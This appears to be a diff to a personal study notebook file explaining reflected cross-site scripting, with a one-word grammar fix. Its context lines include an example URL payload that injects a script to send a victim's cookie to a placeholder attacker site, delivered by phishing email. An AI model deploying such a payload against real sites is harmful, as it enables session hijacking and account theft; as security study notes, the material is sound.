viet34tqc/notebook/technical-terms.md

 - Reflected XSS

-Attackers inject JS through URL.
+Attacker injects JS through URL.
 Basically, he creates a link with malicious JS code like: `abc.com/?search=<script>window.location='[ATTACKER_SITE]?cookie=' + document.cookie </script>`.
 Then he put it into an email that will be sent to victim.
 When the victim clicks on the link, `abc.com` loads, the script is executed first to read the cookie on user's website and then user is redirect to attacker site which implement a log system that can extract the cookie data

 As you can see XSS exploit storage (session or local) and cookie that `httpOnly` set to `false`